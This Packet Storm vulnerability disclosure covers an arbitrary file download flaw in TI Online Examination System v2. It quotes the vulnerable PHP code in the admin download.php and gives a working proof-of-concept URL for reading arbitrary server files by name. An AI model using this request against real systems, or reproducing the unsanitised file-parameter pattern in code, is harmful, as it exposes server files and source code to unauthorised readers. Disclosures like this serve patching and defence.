TI Online Examination System version 2 suffers from an arbitrary file download vulnerability.
72a05e6be66be4f4d8cd71e2b9cca22499130981e8f5d1ee741bdfb182703f3f# Exploit Title: TI Online Examination System v2 - Arbitrary File Download
# Dork: N/A
# Date: 02.08.2018
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904
# Version: 2.0
# Category: Webapps
# Tested on: Kali linux
# Description : The "Export" operation in the admin panel is vulnerable.
The attacker can download and read all files known by the name via
"download.php"
====================================================
# Demo : server/admin/
# Vuln file : /admin/download.php
115. $data_action = $_REQUEST['action'];
116. if($data_action == 'downloadfile')
117. {
118. $file = $_REQUEST['file'];
119. $name = $file;
120. $result = output_file($file, $name);
# PoC :
http://server/admin/download.php?action=downloadfile&file=[filename]
you can write the known file name instead of [filename]. For Example:
'download.php' or 'index.php'
====================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed